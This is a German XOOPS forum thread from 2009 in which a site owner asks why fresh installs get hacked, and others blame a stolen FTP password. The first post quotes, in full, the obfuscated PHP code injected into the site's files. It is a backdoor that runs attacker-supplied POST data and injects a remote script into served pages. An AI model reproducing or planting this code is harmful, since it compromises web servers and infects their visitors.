Fork me on GitHub
"XOOPS ist ein dynamisches OO (Objekt Orientiertes) open source Portal Script geschrieben in PHP. XOOPS ist ein ideales CMS (Content Management System) für den Aufbau von kleineren und grösseren Communities, Firmen-, Intra- und Internet-Portale, Web-Logs und vieles mehr."
forum
Bitte schaut in die DOKUMENTATION oder benutzt die SUCHFUNKTION bevor Ihr Eure Fragen im Forum stellt. Viele Fragen wurden bereits gestellt.

Leser in diesem Thema:   1 Anonyme(r)


(1) 2 »


Neue Seite nach ein paar Stunden gehackt
#1
Benutzerinformationen
Hallo.

Nach langem hin und her hab ich jetzt mal mein Xoops komplett neu installiert. Einmal Version 2.3.3 und einmal 2.3.2b.
Und nach ein paar Stunden ging immer gar nichts mehr. Immer das selbe. Vorallem in den Index.html und in ein paar .php Dateien steht im Kopf immer folgendes:

<?php eval(base64_decode('aWYoIWlzc2V0KCRsZnJqcDEpKXtmdW5jdGlvbiBsZnJqcCgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihwcmVnX21hdGNoKCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJGMWRHOWpZWEl1WldVdmFXMWhaMlZ6TDJkdmIyZHNaVEV5TXprellUSTBORGc0WldKaU56QXVjR2h3SUQ0OEwzTmpjbWx3ZEQ0PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gbGZyanAyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGxmcmpwMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkbGZyanAxKSljYWxsX3VzZXJfZnVuYygkbGZyanAxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2xmcmpwJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2xmcmpwJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGxmcmpwbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignbGZyanAyJykpIT0nbGZyanAyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?><?php


Warum kann ich mir nicht erklären. Ich hab auf dem Webserver komplett alle Dateien aus dem html Ordner gelöscht es war also nur noch Xoops drauf. Im Protector wurde alles grün also sicher angezeigt. Bei jeder Neuinstallation hab ich eine neue MySQL Datenbank angelegt und Passwörter gändert. Module waren nur Protector und WF-Downloads 3.2 und mal 3.1 installiert.

Hat jemand eine Ahnung wie das sein kann? Bin echt am verzweifeln :(


Geschrieben: 20.10.2009
Erstelle PDF des Beitrags Drucke

Aw:: Neue Seite nach ein paar Stunden gehackt
#2
Benutzerinformationen
Hallo!

Vermutlich kennt jemand das Passwort von deinem FTP.

Chris

Geschrieben: 20.10.2009
_________________
PersonalBit | Formel 1
Erstelle PDF des Beitrags Drucke

Aw:: Neue Seite nach ein paar Stunden gehackt
#3
Benutzerinformationen
... oder der Webserver selbst ist das Problem.

Geschrieben: 20.10.2009
_________________
if(ahnung == 0) {use SEARCH; use BRAIN; use GOOGLE; } else {make post;}
Wie man Fragen richtig stellt
Erstelle PDF des Beitrags Drucke

Aw:: Neue Seite nach ein paar Stunden gehackt
#4
Benutzerinformationen
geht zu einem russischen Server, denke mal das der nicht mehr so frisch ist

Auch ist zu 99,9% nicht XOOPS dafür verantwortlich,
entweder dein Rechner (Keylogger o.ä.) oder der Server selbst.

Geschrieben: 20.10.2009
Erstelle PDF des Beitrags Drucke

Aw:: Neue Seite nach ein paar Stunden gehackt
#5
Benutzerinformationen
Ok. Jetzt scheint alles wieder zu passen.

Wahrscheinlich hat irgend ein Bot mein FTP Passwort gehackt.. XOOPS war unschuldig :)

Geschrieben: 23.10.2009
Erstelle PDF des Beitrags Drucke

Aw:: Neue Seite nach ein paar Stunden gehackt
#6
Benutzerinformationen
Zitat:

double09 schrieb:
Wahrscheinlich hat irgend ein Bot mein FTP Passwort gehackt..


Mir wäre das zu heiss , oder weisst du es genau?

Geschrieben: 23.10.2009
Erstelle PDF des Beitrags Drucke

Aw:: Neue Seite nach ein paar Stunden gehackt
#7
Benutzerinformationen
Hallo zusammen

Ein Bekannter hatte genau dieses Problem, in der Tat ist (wer auch immer) an das FTP Passwort gekommen. Das Problem lag auf seinem Rechner, er hatte sich, daran konnte er sich zumindest erinnern, irgendein "Anti-Sypware Programm" geladen, dass diesen Hybrid verteilt hat und nach Russland telefonierte! Er hatte auch kein XOOPS im Einsatz, daher kann man XOOPS an der Stelle fast sicher aus der Linie nehmen, was Sicherheit oder Lücke betrifft!

Gruß

Geschrieben: 23.10.2009
_________________
website
Erstelle PDF des Beitrags Drucke

Aw:: Neue Seite nach ein paar Stunden gehackt
#8
Benutzerinformationen
meine Antwort bezog sich nicht aufs XOOPS

Geschrieben: 23.10.2009
Erstelle PDF des Beitrags Drucke

Aw:: Neue Seite nach ein paar Stunden gehackt
#9
Benutzerinformationen
Meine Antwort im wesentlichen auch nicht Alfred
Schönes WE

Gruß

Geschrieben: 23.10.2009
_________________
website
Erstelle PDF des Beitrags Drucke

Aw:: Neue Seite nach ein paar Stunden gehackt
#10
Benutzerinformationen
Ich gehe davon aus, dass mein Passwort rausgefunden wurde da ich auf dem Webhost jahrelang keine wichtigen Files liegen hatte und deswegen dort auch nur ein ziemlich simples Passwort angelegt hatte.

Vor der Passwortänderung wäre die Seite bestimmt schon wieder 10 mal down gewesen ;)

Jetzt hab ich ein ziemlich sicheres Passwort und alles scheint bis jetzt ok zu sein.

Geschrieben: 23.10.2009
Erstelle PDF des Beitrags Drucke







[Erweiterte Suche]